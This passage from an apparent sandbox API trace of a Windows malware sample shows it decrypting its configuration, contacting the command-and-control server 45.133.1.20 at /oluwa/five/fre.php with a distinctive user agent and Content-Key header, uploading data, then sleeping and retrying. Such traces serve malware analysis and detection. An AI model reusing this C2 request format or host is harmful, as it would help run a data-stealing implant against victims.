phProv=0x19fca8*=0x6bef48) returned 1 [0297.756] GetProcessHeap () returned 0x6a0000 [0297.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0297.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.758] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0297.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.759] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.760] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.760] GetProcessHeap () returned 0x6a0000 [0297.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0297.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.786] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0297.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.787] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0297.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.792] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0297.792] GetProcessHeap () returned 0x6a0000 [0297.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.793] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0297.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.794] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0297.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.795] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0297.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.796] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0297.796] GetProcessHeap () returned 0x6a0000 [0297.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0297.796] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0297.796] GetProcessHeap () returned 0x6a0000 [0297.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0297.797] socket (af=2, type=1, protocol=6) returned 0xb30 [0297.797] connect (s=0xb30, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0297.822] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0297.822] GetProcessHeap () returned 0x6a0000 [0297.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0297.822] GetProcessHeap () returned 0x6a0000 [0297.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0297.824] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.825] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.825] GetProcessHeap () returned 0x6a0000 [0297.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da4c8 [0297.825] GetProcessHeap () returned 0x6a0000 [0297.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.826] GetProcessHeap () returned 0x6a0000 [0297.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0297.826] GetProcessHeap () returned 0x6a0000 [0297.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0297.827] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.828] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.828] GetProcessHeap () returned 0x6a0000 [0297.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0297.829] GetProcessHeap () returned 0x6a0000 [0297.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.829] send (s=0xb30, buf=0x6bd460*, len=242, flags=0) returned 242 [0297.831] send (s=0xb30, buf=0x6bb998*, len=159, flags=0) returned 159 [0297.833] GetProcessHeap () returned 0x6a0000 [0297.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0297.833] recv (in: s=0xb30, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0297.904] GetProcessHeap () returned 0x6a0000 [0297.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0297.905] GetProcessHeap () returned 0x6a0000 [0297.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0297.905] GetProcessHeap () returned 0x6a0000 [0297.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da4c8 | out: hHeap=0x6a0000) returned 1 [0297.906] GetProcessHeap () returned 0x6a0000 [0297.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0297.906] closesocket (s=0xb30) returned 0 [0297.906] GetProcessHeap () returned 0x6a0000 [0297.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0297.906] GetProcessHeap () returned 0x6a0000 [0297.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.907] GetProcessHeap () returned 0x6a0000 [0297.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0297.907] GetProcessHeap () returned 0x6a0000 [0297.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0297.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1858) returned 0xb30 [0297.911] Sleep (dwMilliseconds=0xea60) [0297.912] GetProcessHeap () returned 0x6a0000 [0297.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0297.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.922] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0297.931] GetProcessHeap () returned 0x6a0000 [0297.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0297.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.932] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0297.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.933] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.934] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.934] GetProcessHeap () returned 0x6a0000 [0297.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0297.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.936] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0297.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.937] CryptDestroyKey (hKey=0x6ad020) returned 1 [0297.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.938] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0297.938] GetProcessHeap () returned 0x6a0000 [0297.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.939] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.940] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.960] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.961] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.961] GetProcessHeap () returned 0x6a0000 [0297.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0297.961] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.961] GetProcessHeap () returned 0x6a0000 [0297.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0297.962] GetProcessHeap () returned 0x6a0000 [0297.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.962] GetProcessHeap () returned 0x6a0000 [0297.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0297.963] GetProcessHeap () returned 0x6a0000 [0297.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0297.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.972] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0297.978] GetProcessHeap () returned 0x6a0000 [0297.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0297.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.980] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0297.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.981] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.982] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.982] GetProcessHeap () returned 0x6a0000 [0297.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0297.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.983] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0297.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.984] CryptDestroyKey (hKey=0x6ad020) returned 1 [0297.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.987] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0297.987] GetProcessHeap () returned 0x6a0000 [0297.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.989] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0297.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.990] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0297.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.991] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0297.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.992] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0297.992] GetProcessHeap () returned 0x6a0000 [0297.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0297.992] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0297.992] GetProcessHeap () returned 0x6a0000 [0297.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0297.992] socket (af=2, type=1, protocol=6) returned 0xb34 [0297.993] connect (s=0xb34, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0298.023] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0298.039] GetProcessHeap () returned 0x6a0000 [0298.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0298.039] GetProcessHeap () returned 0x6a0000 [0298.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0298.040] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.041] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.041] GetProcessHeap () returned 0x6a0000 [0298.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da888 [0298.041] GetProcessHeap () returned 0x6a0000 [0298.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.042] GetProcessHeap () returned 0x6a0000 [0298.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0298.042] GetProcessHeap () returned 0x6a0000 [0298.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0298.043] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0298.044] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.044] GetProcessHeap () returned 0x6a0000 [0298.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0298.044] GetProcessHeap () returned 0x6a0000 [0298.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0298.044] send (s=0xb34, buf=0x6bd460*, len=242, flags=0) returned 242 [0298.045] send (s=0xb34, buf=0x6bb998*, len=159, flags=0) returned 159 [0298.045] GetProcessHeap () returned 0x6a0000 [0298.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0298.045] recv (in: s=0xb34, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0298.120] GetProcessHeap () returned 0x6a0000 [0298.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0298.121] GetProcessHeap () returned 0x6a0000 [0298.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0298.121] GetProcessHeap () returned 0x6a0000 [0298.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da888 | out: hHeap=0x6a0000) returned 1 [0298.121] GetProcessHeap () returned 0x6a0000 [0298.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0298.122] closesocket (s=0xb34) returned 0 [0298.122] GetProcessHeap () returned 0x6a0000 [0298.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0298.123] GetProcessHeap () returned 0x6a0000 [0298.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0298.123] GetProcessHeap () returned 0x6a0000 [0298.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0298.124] GetProcessHeap () returned 0x6a0000 [0298.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0298.125] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x185c) returned 0xb34 [0298.132] Sleep (dwMilliseconds=0xea60) [0298.133] GetProcessHeap () returned 0x6a0000 [0298.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0298.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.134] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.143] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0298.166] GetProcessHeap () returned 0x6a0000 [0298.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0298.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.168] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0298.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.169] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.170] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.171] GetProcessHeap () returned 0x6a0000 [0298.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0298.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.173] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0298.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.176] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0298.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.178] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0298.178] GetProcessHeap () returned 0x6a0000 [0298.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0298.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.179] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.180] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.182] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0298.183] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.183] GetProcessHeap () returned 0x6a0000 [0298.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0298.183] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.184] GetProcessHeap () returned 0x6a0000 [0298.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0298.184] GetProcessHeap () returned 0x6a0000 [0298.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0298.185] GetProcessHeap () returned 0x6a0000 [0298.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0298.185] GetProcessHeap () returned 0x6a0000 [0298.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0298.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0298.207] GetProcessHeap () returned 0x6a0000 [0298.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0298.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.211] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0298.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.212] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0298.215] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.215] GetProcessHeap () returned 0x6a0000 [0298.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 